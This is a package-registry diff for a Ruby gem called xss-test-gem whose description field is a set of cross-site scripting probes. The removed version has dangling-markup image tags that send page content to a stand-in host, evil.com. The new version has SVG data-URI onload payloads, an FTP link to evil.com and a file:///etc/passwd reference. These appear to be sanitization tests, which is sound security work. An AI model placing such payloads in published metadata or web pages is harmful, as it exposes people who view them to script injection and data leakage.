xss-test-gem 0.1.9 → 0.2.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. checksums.yaml +2 -2
  2. metadata +10 -6
checksums.yaml CHANGED
@@ -1,4 +1,4 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: e15add40565e1b917c3e1cee50fc1301249d96f8e6f91f59c82636761eb7756f
4
- data.tar.gz: 20e50172e8c6a99f6d5aa95dc4ed5fc6c459f20c7b17efeeb2e02d128d9fb32a
3
+ metadata.gz: ca5a5516789f01aed293fa6a4d4f486a6169962194a7863964eb4ac5720a5adf
4
+ data.tar.gz: c1132c93d805239179d09906c7ab5a5522813bd8f3f51f2dcf6519b5091d66ec
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: xss-test-gem
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.9
4
+ version: 0.2.2
5
5
  platform: ruby
6
6
  authors:
7
7
  - Testing Buffalo
@@ -9,13 +9,17 @@ email: testingbuffalo@apexblack.org
9
9
  homepage: https://rubygems.org/gems/xss-test-gem
10
10
  licenses:
11
11
  - MIT
12
- summary: Dangling markup test
12
+ summary: Data URI tests
13
13
  description: |
14
- == Dangling Markup Test
14
+ == Data URI and Protocol Tests
15
15
 
16
- <img src="https://evil.com/collect?
17
- <img src='https://evil.com/collect?
18
- <img src=https://evil.com/collect?
16
+ Data URI image: {image}[data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"></svg>]
17
+
18
+ SVG data URI: {image}[data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+PC9zdmc+]
19
+
20
+ FTP image: {image}[ftp://evil.com/test.jpg]
21
+
22
+ File protocol: {image}[file:///etc/passwd]
19
23
 
20
24
  required_ruby_version: !ruby/object:Gem::Requirement
21
25
  requirements: